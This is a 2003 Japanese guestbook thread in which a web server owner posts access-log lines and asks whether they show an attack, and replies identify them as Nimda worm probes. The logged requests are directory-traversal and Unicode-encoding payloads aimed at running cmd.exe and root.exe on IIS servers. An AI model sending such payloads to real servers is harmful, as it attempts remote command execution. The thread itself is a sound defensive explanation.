[03/12/17 02:12] ログにアタックの跡？

AN HTTPD ゲストブック/コメント集(2003年12月17日02:12)

中田昭雄 nakata@st.rim.or.jp 2003/12/17 21:16

seboji さん、
なんの心配もいりません。TAKAYAさんのいうように Nimda に感染したPCがやみくもに出しているリクエストです。

http://homepage1.nifty.com/yito/namazu/　
で、"scripts/root.exe" などで検索すると出てきますが、
http://homepage1.nifty.com/yito/namazu/gbook/20020907.2206.html
あたりを読んでもらうのがよいでしょう。

TAKAYA hase261@yahoo.co.jp 2003/12/17 13:12

seboji様

たしか、ニムダ(ウイルス)による攻撃だったと思います。

seboji a@chuta.bne.jp 2003/12/17 02:12

今日ログを確認したら、このようなログが残っており、アタックではないかとビビッています。
どなたか詳しい方、解説いただけないでしょうか？

219.147.XXX.XXX - - [16/Dec/2003:03:55:35 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:36 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:37 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:38 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:39 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:40 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:41 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:42 +0900] "GET /msadc/..%5c../..%5c../..%5c/..ﾁ\../..ﾁ\../..ﾁ\../winnt/system32/cmd.exe HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:43 +0900] "GET /scripts/..ﾁ\../winnt/system32/cmd.exe HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:44 +0900] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:45 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194 
219.147.XXX.XXX - - [16/Dec/2003:03:55:47 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194 
219.147.XXX.XXX - - [16/Dec/2003:03:55:47 +0900] "GET /scripts/..ｴ5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:48 +0900] "GET /scripts/..ｴ5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:48 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 
219.147.XXX.XXX - - [16/Dec/2003:03:55:49 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215